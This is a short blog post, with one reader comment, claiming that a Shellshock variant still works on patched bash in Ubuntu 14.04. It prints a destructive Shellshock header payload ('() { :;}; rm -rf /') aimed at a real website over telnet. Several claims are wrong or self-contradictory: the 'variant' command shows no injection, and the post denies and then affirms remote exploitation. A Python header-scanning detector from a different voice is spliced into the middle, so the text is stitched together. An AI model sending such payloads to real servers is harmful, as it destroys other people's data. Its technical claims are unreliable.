A variant of the shellshock bug that still works with the bash 4.3.11 shell.

This is a variant of the shellshock bug for bash that still works on a patched system. I am using Ubuntu 14.04 and this still works for me.

env VAR1='me() {echo "hello"}\ ' /bin/touch /home/$LOGNAME/my.text

So you can still put arbitrary content after the function definition in a bash script. I have installed the latest bash updates and this still works. So this has quite a way to go to be fully secure. It is better to use another shell. I used the /bin/dash shell as a replacement for my default bash shell on Ubuntu. There is also this method, using telnet, in which environment variables are used to inject malicious code into a CGI script running on an Apache2 website.

telnet google.com 80                                                                                                                         [14-09-27 23:07:14]
Trying 2607:f8b0:4005:800::1007...
Connected to google.com.
Escape character is '^]'.
HTTP/1.1 GET /
Host: google.com
User-Agent: () { :;}; rm -rf /
Accept: */*

This vulnerability must be fixed, but how do you create a regex that can check every possible permutation of malicious code inserted after a bash function? I recommend using csh or ksh instead of bash. There are no “remote” exploits for the Linux bash shell. Bash does not have network connectivity. The only way that this could actually be exploited is if the remote server has an SSH service running that is forwarded to the Internet. There may be remote code execution vulnerabilities when bash is used in connection with a network service like a web server. CGI scripts could be vulnerable to this attack. But patching your system should be of the utmost concern when dealing with this problem. That is the best way to keep your Internet-connected systems protected from attack. That and a good firewall.
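On the regex question above: unpatched bash imported a function from an environment value only when the value began with `() {`, so a filter can match that prefix instead of the code that follows it. The added example below (not code from the original post) applies that check to request headers before a server turns them into CGI `HTTP_*` variables; the sample requests, the header names and the whitespace-tolerant pattern are constructed assumptions.

```python
import re

# Unpatched bash imported a function from an environment value only when the
# value began with the four characters "() {". Extra whitespace is tolerated
# here so that sloppy probes are flagged too (an assumption of this example).
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")


def cgi_env_name(header):
    """Name under which a CGI server exports a request header (RFC 3875)."""
    return "HTTP_" + header.upper().replace("-", "_")


def scan_request(raw):
    """Return (CGI variable, value) pairs whose value starts like a function definition."""
    findings = []
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    for line in head.split("\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and FUNC_PREFIX.match(value):
            findings.append((cgi_env_name(name.strip()), value.strip()))
    return findings


# Constructed sample requests (not captured traffic).
BENIGN = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.test:8080\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    # "() {" appears, but not at the start of the value, so it is not matched.
    "X-Note: init() { return; }\r\n"
    "Accept: */*\r\n\r\n"
)
PROBE = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "User-Agent: () { :;}; echo probe\r\n"
    "Referer: ()  { x; }; echo probe\r\n"
    "Accept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("probe", PROBE)):
        print(label, scan_request(request))
```

A filter like this belongs in front of the CGI handler as a detection or blocking layer; it does not replace patching bash.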

1 response to “A variant of the shellshock bug that still works with the bash 4.3.11 shell.”

I just tested this on an updated Amazon AWS instance with all updates and this still works on Ubuntu server 14.04. Time to switch to a different shell.
